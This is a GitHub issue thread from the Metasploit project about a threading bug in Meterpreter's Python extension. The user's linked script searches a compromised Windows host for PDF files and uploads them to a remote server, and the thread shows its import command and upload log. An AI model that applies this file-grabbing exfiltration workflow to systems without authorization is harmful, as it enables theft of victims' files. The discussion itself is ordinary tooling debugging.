### ISSUE TITLE
Meterpreter python module fails with urllib and threading

### ISSUE THREAD

**Issue by s3c** [rapid7/metasploit-framework#7329]
I'm writing some python scripts to automate information gathering, which I configured to launch with AutoRunScript. When running my script on Linux and Windows without meterpreter it works great, but when using the meterpreter python module the threads disappear after calling urllib2.urlopen.

To reproduce, use the script below, which has the threading module commented and does everything in a single thread:

https://github.com/s3c/Misc/blob/master/Python/filegrabber.py

Execute the command:

```
python_import -f /root/filegrabber.py
```

Which gives the following output, as expected:

```
[*] Importing /root/filegrabber.py ...
[+] Content written to stdout:
[*] Starting regex filename search
[+] Uploading as VWCYBV: C:\Users\User\Desktop\abc.pdf
[+] Upload of VWCYBV returned code 200
[+] Uploading as 1WEADL: C:\Users\User\Desktop\Dir1\def.pdf
[+] Upload of 1WEADL returned code 200
[*] Regex filename search complete
```

However, when uncommenting line 64,65, and 66, and commenting line 67 to enable pushing files with threads. The threads die after executing urllib2.urlopen on line 53. This however works fine on both Windows and Linux without using meterpreter. Example failed output below:

```
[*] Importing /root/filegrabber.py ...
[+] Content written to stdout:
[*] Starting regex filename search
[+] Uploading as VWCYBV: C:\Users\User\Desktop\abc.pdf
[+] Uploading as 1WEADL: C:\Users\User\Desktop\Dir1\def.pdf
[*] Regex filename search complete
```

Thus, no exception is thrown nor is any message displayed, the thread just dies without performing the urllib request. It would appear that the meterpreter python module doesn't play nice when using threads. I'm running stock metasploit 4.12.23-dev from within Kali

**Comment by egypt** [comment]
Have you verified on the server that the request is not getting sent? Threading makes output tricky sometimes -- I think it's possible the request is happening and you're just not seeing the `print`.

@OJ am I off base here? Is threading on the python extension possible?

**Comment by s3c** [comment]
I can confirm that the requests do not get made when using threading, which is interesting as the messages inside the threads still get printed. I tested with:

python -m SimpleHTTPServer 80

Also, every now and again when not using threading, the script exits/dies/whatever halfway through, and no further output is given. I haven't been able to reproduce this reliably though. So it seems this script either exposes a couple of quirks, or my installation is broken somehow. Can anyone confirm my observations?

**Comment by OJ** [comment]
Technically this should be filed as a bug against the [Metasploit Payloads](https://github.com/rapid7/metasploit-payloads/) repo, but we'll leave it here for now! @s3c if you have future issues with Meterpreter itself, please may I request that you log the bugs over there? I've filed a 

Thank you @s3c for the report. This behaviour sounds strange. Threading inside the python extension _should_ work without a problem. I'll have to investigate what is going on here. I'll investigate soon and get back to you.

Cheers!

**Comment by s3c** [comment]
Thanks @OJ, will do. I just realized that urllib2 isn't thread safe, so this could be completely my fault. I'm going to try a workaround and will update when I have some findings.

**Comment by s3c** [comment]
The thread safety issue for urllib2 steams from the fact that urlopen uses the same opener for all calls. Even when creating a dedicated opener for each thread, I get the same response. For reference, the following lines were used instead of the urlopen line in the original script:

opener = urllib2.build_opener()    
opener.open(POST_URL + tmpname, file_data)

This matches the results of running the script in python directly on Windows or Linux, where it works perfectly if threads are used or not. It could still be that some weird condition is happening because it isn't thread safe, which doesn't happen natively. One way to tell would be to make use of the requests library, which is thread safe. I've logged a feature request to have it included.

**Comment by dwelch-r7** [comment]
Closing issue as it's tracked over here: https://github.com/rapid7/metasploit-payloads/issues/119
